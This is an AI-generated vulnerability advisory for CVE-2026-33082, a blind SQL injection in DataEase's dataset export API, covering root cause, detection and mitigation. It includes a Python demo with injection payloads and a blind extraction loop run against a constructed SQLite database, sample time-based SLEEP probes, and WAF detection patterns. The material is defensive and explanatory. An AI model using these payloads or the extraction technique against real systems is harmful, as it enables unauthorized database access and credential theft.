CVE-2026-33082 Overview
DataEase, an open source data visualization analysis tool, contains a SQL injection vulnerability in its dataset export functionality affecting versions 2.10.20 and below. The vulnerability exists in the expressionTree parameter within the POST /de2api/datasetTree/exportDataset endpoint, where user-controlled filter values are deserialized and passed to WhereTree2Str.transFilterTrees for SQL translation without sanitization or parameterization. This allows any authenticated user with low privileges to inject arbitrary SQL through the "like" filter terms, enabling blind SQL injection, including time-based extraction of sensitive database information.
Critical Impact
Authenticated attackers can execute arbitrary SQL against the backend database, leading to unauthorized data access and, where the database account allows it, data modification. Because the injected SQL runs with the privileges of the database account DataEase connects with, a broadly privileged account turns a blind injection into complete database compromise; a read-only account limits the impact to data disclosure.
Affected Products
- DataEase versions 2.10.20 and below
- DataEase data visualization deployments using the dataset export API endpoint
- Self-hosted DataEase installations with network-accessible API endpoints
Discovery Timeline
- April 16, 2026 - CVE-2026-33082 published to NVD
- April 16, 2026 - Last updated in NVD database
Technical Details for CVE-2026-33082
Vulnerability Analysis
This SQL injection vulnerability (CWE-89) stems from improper input validation in the dataset export workflow. When a user submits a request to export dataset data, the expressionTree parameter is deserialized into a filtering object structure. This object is subsequently processed by the WhereTree2Str.transFilterTrees method, which constructs SQL WHERE clauses based on the filter definitions.
The critical flaw occurs when handling "like" filter terms within the expression tree. Values provided in these filter terms are directly concatenated into SQL fragments without any sanitization or parameterized query handling. An attacker can craft malicious input that escapes the string literal context in the filter value, thereby injecting arbitrary SQL syntax into the generated query.
The network-accessible nature of this vulnerability combined with the low privilege requirements makes it particularly dangerous for organizations running DataEase in environments where many users hold accounts, since any one of those accounts is sufficient to reach the export endpoint. Successful exploitation exposes the confidentiality of everything the DataEase database account can read, and the integrity and availability of everything it can write.
Root Cause
The root cause is insufficient input validation and lack of parameterized queries in the WhereTree2Str.transFilterTrees method. When processing filter expressions containing "like" operators, the code directly concatenates user-supplied values into SQL statement strings. This violates secure coding practices that mandate prepared statements or parameterized queries for all database operations involving user input. Note that binding values alone is not the whole fix: field names and operators in a filter tree cannot be bound as parameters, so they must be checked against an allowlist of the dataset's actual columns and supported operators.
Attack Vector
The attack is executed over the network against the DataEase API endpoint. An authenticated attacker with low-level privileges sends a crafted POST request to /de2api/datasetTree/exportDataset containing a malicious expressionTree parameter. By injecting SQL metacharacters that break out of the string literal context in a "like" filter term, the attacker can append arbitrary SQL commands.
Time-based blind SQL injection techniques are particularly effective, allowing attackers to extract database information character by character by observing response timing differences, because the export response itself need not reflect the injected query's result. This method can be used to enumerate database schemas, extract sensitive data such as user credentials and, if the DataEase database account holds write or administrative rights, modify data or take further action within the database system.
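The following Python model is an added illustration written for this page, not DataEase's WhereTree2Str code. It reproduces the bug class described above (a "like" value spliced into the WHERE clause) beside a parameterised translation, then runs both against a constructed in-memory SQLite database: a quote in the filter value breaks out of the literal, and a boolean-based blind loop recovers a constructed secret one character at a time. SQLite has no delay function, so the oracle here is "rows returned or not" rather than response time; the time-based variant on MySQL or PostgreSQL only swaps the oracle for SLEEP()/pg_sleep(). The filter-tree shape, table names and the column allowlist are assumptions for the demo.

```python
"""Illustrative model of the CVE-2026-33082 bug class: a filter tree whose
"like" value is spliced into SQL text, next to a parameterised translation.
Example code written for this page; it is not DataEase's WhereTree2Str code,
and the tables, columns and rows below are constructed for the demo."""
import sqlite3

ALLOWED_FIELDS = {"region", "revenue"}  # hypothetical column allowlist


def where_vulnerable(tree):
    """Unsafe: the 'like' value is concatenated into the WHERE clause, so a
    quote inside it terminates the string literal and the rest is parsed as SQL."""
    parts = []
    for item in tree["items"]:
        if item["term"] == "like":
            parts.append(f"{item['field']} LIKE '%{item['value']}%'")
        elif item["term"] == "eq":
            parts.append(f"{item['field']} = '{item['value']}'")
        else:
            raise ValueError(f"unsupported term {item['term']!r}")
    return " AND ".join(parts), []


def where_safe(tree):
    """Hardened: field names (which cannot be bound) are checked against an
    allowlist; every value is passed as a bind parameter, never as SQL text."""
    parts, params = [], []
    for item in tree["items"]:
        field, term = item["field"], item["term"]
        if field not in ALLOWED_FIELDS:
            raise ValueError(f"unknown field {field!r}")
        if term == "like":
            parts.append(f'"{field}" LIKE ?')
            params.append(f"%{item['value']}%")
        elif term == "eq":
            parts.append(f'"{field}" = ?')
            params.append(item["value"])
        else:
            raise ValueError(f"unsupported term {term!r}")
    return " AND ".join(parts), params


def export_rows(conn, tree, translate):
    """Stand-in for the export handler: translate the tree, run the query."""
    clause, params = translate(tree)
    return conn.execute(f"SELECT region, revenue FROM dataset WHERE {clause}", params).fetchall()


def like_tree(value, field="region"):
    """Simplified expressionTree with a single 'like' filter (assumed shape)."""
    return {"logic": "and", "items": [{"field": field, "term": "like", "value": value}]}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE dataset (region TEXT, revenue INTEGER);
        INSERT INTO dataset VALUES ('North', 100), ('South', 200), ('East', 300);
        CREATE TABLE sys_user (username TEXT, password_hash TEXT);
        INSERT INTO sys_user VALUES ('admin', '5f4d');   -- constructed secret
    """)
    return conn


def blind_extract(conn, translate, alphabet="0123456789abcdef", max_len=8):
    """Boolean-based blind extraction of admin's password hash via the 'like'
    value: the export returns rows only when the guessed character is right.
    A time-based variant uses a delay (SLEEP, pg_sleep, WAITFOR) as the oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = ("zz' OR (SELECT substr(password_hash, %d, 1) FROM sys_user "
                       "WHERE username = 'admin') = '%s' AND region LIKE '" % (pos, ch))
            if export_rows(conn, like_tree(payload), translate):
                recovered += ch
                break
        else:
            break  # no character matched: end of value, or the injection did not work
    return recovered


def demo():
    conn = make_db()
    breakout = "x' OR '1' LIKE '1"  # closes the literal, appends a tautology
    return {
        "normal": export_rows(conn, like_tree("Nor"), where_vulnerable),
        "vulnerable_rows": len(export_rows(conn, like_tree(breakout), where_vulnerable)),
        "safe_rows": len(export_rows(conn, like_tree(breakout), where_safe)),
        "vulnerable_leak": blind_extract(conn, where_vulnerable),
        "safe_leak": blind_extract(conn, where_safe),
    }


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable translator the tautology payload returns every row and the blind loop recovers the whole constructed hash; against the parameterised translator the same payloads are just search strings that match nothing, which is exactly the behaviour the fix in 2.10.21 needs to produce.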
Detection Methods for CVE-2026-33082
Indicators of Compromise
- Unusual or malformed requests to the /de2api/datasetTree/exportDataset endpoint containing SQL syntax in filter parameters
- Abnormally long response times from dataset export requests indicating time-based injection probing
- Database query logs showing unexpected SLEEP(), BENCHMARK(), pg_sleep() or WAITFOR DELAY calls, or conditional expressions wrapping them, in queries issued by the DataEase database account
- Error logs containing SQL syntax errors originating from dataset export operations
- Multiple rapid requests to the export endpoint from the same user session
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in POST request bodies to the dataset export endpoint, in detect-then-block mode at first, since keyword matching will also flag legitimate filter text containing words such as "select"
- Monitor application logs for repeated 500 errors or SQL-related exceptions from the transFilterTrees method
- Deploy database activity monitoring to detect unusual query patterns including time-based blind injection signatures
- Review authentication logs for compromised accounts that may be used to exploit this vulnerability
Monitoring Recommendations
- Enable verbose logging on the DataEase API layer to capture full request payloads to the /de2api/datasetTree/exportDataset endpoint
- Configure database query logging to identify injection attempts and track query execution times
- Set up alerting for anomalous database response latencies that may indicate time-based exploitation
- Implement real-time monitoring of dataset export API usage patterns per user account
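As an added example, not part of DataEase or any vendor tooling, the script below implements the three indicators listed above (SQL syntax inside a "like" filter value, abnormally slow exports, and bursts of export calls from one account) and runs them over constructed log records. The record format, one JSON object per line carrying the user, path, latency and raw request body, is an assumption; map the field names onto whatever your reverse proxy or DataEase application logger actually emits. The latency and burst thresholds are placeholders to tune per deployment.

```python
"""Detection logic for CVE-2026-33082 probing, run over constructed sample log
records. Example code written for this page, not part of DataEase. The log
format (one JSON object per line carrying user, path, latency and the raw
request body) is an assumption; map the field names onto what your reverse
proxy or DataEase application logger actually emits."""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

EXPORT_PATH = "/de2api/datasetTree/exportDataset"
# Quote-then-operator (escaping the LIKE literal), comment markers, and the
# delay primitives of MySQL, PostgreSQL and SQL Server.
SQLI_RE = re.compile(r"(?i)('\s*(or|and)\b|'\s*;|--|/\*|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(|waitfor\s+delay)")
SLOW_MS = 3000                      # placeholder: tune to normal export latency
BURST_N, BURST_WINDOW = 5, timedelta(seconds=10)


def like_values(node):
    """Yield every 'like' filter value anywhere in a nested expressionTree."""
    if isinstance(node, dict):
        if node.get("term") == "like" and "value" in node:
            yield str(node["value"])
        for child in node.values():
            yield from like_values(child)
    elif isinstance(node, list):
        for child in node:
            yield from like_values(child)


def analyse(lines):
    """Return (kind, user, detail) alerts for the three indicators on this page:
    SQL syntax in a like-filter, abnormally slow exports, and bursts per account."""
    alerts, recent = [], defaultdict(deque)
    for line in lines:
        rec = json.loads(line)
        if rec.get("path") != EXPORT_PATH:
            continue
        user, ts = rec["user"], datetime.fromisoformat(rec["ts"])
        try:
            body = json.loads(rec.get("body", ""))
        except json.JSONDecodeError:
            body = {}
        for value in like_values(body.get("expressionTree")):
            if SQLI_RE.search(value):
                alerts.append(("sqli_pattern", user, value))
        if rec.get("latency_ms", 0) >= SLOW_MS:
            alerts.append(("slow_export", user, rec["latency_ms"]))
        window = recent[user]
        window.append(ts)
        while ts - window[0] > BURST_WINDOW:
            window.popleft()
        if len(window) == BURST_N:
            alerts.append(("burst", user, BURST_N))
    return alerts


def sample_log():
    """Constructed records: one legitimate export, one unrelated call, and five
    rapid time-based probes (SLEEP fires only when the injected condition holds)."""
    def rec(ts, user, path, latency, value):
        tree = {"logic": "and", "items": [{"field": "region", "term": "like", "value": value}]}
        return json.dumps({"ts": ts, "user": user, "path": path, "status": 200,
                           "latency_ms": latency, "body": json.dumps({"expressionTree": tree})})
    lines = [rec("2026-04-16T10:00:00", "alice", EXPORT_PATH, 210, "North"),
             rec("2026-04-16T10:00:30", "mallory", "/de2api/datasetTree/tree", 40, "North")]
    probes = [(5012, "x' AND SLEEP(5) AND '1"), (5008, "x' AND IF(1=1,SLEEP(5),0) AND '1"),
              (120, "x' AND IF(1=2,SLEEP(5),0) AND '1"), (5020, "x' AND SLEEP(5)-- "),
              (115, "x' OR 1=2 AND '1")]
    for i, (latency, value) in enumerate(probes):
        lines.append(rec("2026-04-16T10:01:%02d" % (2 * i), "mallory", EXPORT_PATH, latency, value))
    return lines


if __name__ == "__main__":
    for alert in analyse(sample_log()):
        print(alert)
```

The three checks are deliberately independent: a time-based probe whose condition is false completes quickly and evades the latency check, but still trips the syntax check; an attacker who avoids all the listed keywords still needs a quote to leave the literal and still needs many requests per extracted character, which the burst check catches.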
How to Mitigate CVE-2026-33082
Immediate Actions Required
- Upgrade DataEase to version 2.10.21 or later immediately to remediate this vulnerability
- Review access logs for evidence of exploitation attempts against the dataset export endpoint
- Restrict network access to the DataEase API to trusted users and networks pending upgrade
- Audit database logs for signs of data exfiltration or unauthorized queries
- Review and rotate database credentials if exploitation is suspected
Patch Information
The DataEase development team has addressed this vulnerability in version 2.10.21. Organizations should upgrade to this version or later to receive the security fix. The patch is available through the official GitHub Release v2.10.21. Additional technical details about the vulnerability can be found in the GitHub Security Advisory GHSA-xxpw-2c8q-g693.
Workarounds
- Implement a reverse proxy or WAF rule to block requests containing SQL injection patterns in the expressionTree parameter
- Temporarily disable or restrict access to the /de2api/datasetTree/exportDataset endpoint until patching is complete
- Apply network segmentation to limit which users and systems can access the DataEase API
- Configure database user permissions to enforce least privilege, limiting the potential impact of successful injection
# Example: block suspicious export requests at the reverse proxy (nginx with the ModSecurity v3 connector)
# A plain nginx "if ($request_body ~* ...)" does not work here: "if" is evaluated in the rewrite phase,
# before the request body has been read, so $request_body is empty at that point. Load the rules below with
# "modsecurity on; modsecurity_rules_file /etc/nginx/modsec/dataease.conf;" in the location block instead.
SecRuleEngine On
SecRequestBodyAccess On
SecRule REQUEST_URI "@beginsWith /de2api/datasetTree/exportDataset" \
    "id:100001,phase:2,deny,status:403,log,msg:'SQL syntax in DataEase export filter',chain"
    SecRule REQUEST_BODY "@rx (?i)('\s*(or|and)\b|\bunion\b|\bselect\b|sleep\s*\(|benchmark\s*\(|waitfor\s+delay)"
# Keyword matching is a stopgap only: it blocks legitimate filter text containing these words and can be bypassed; upgrade.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.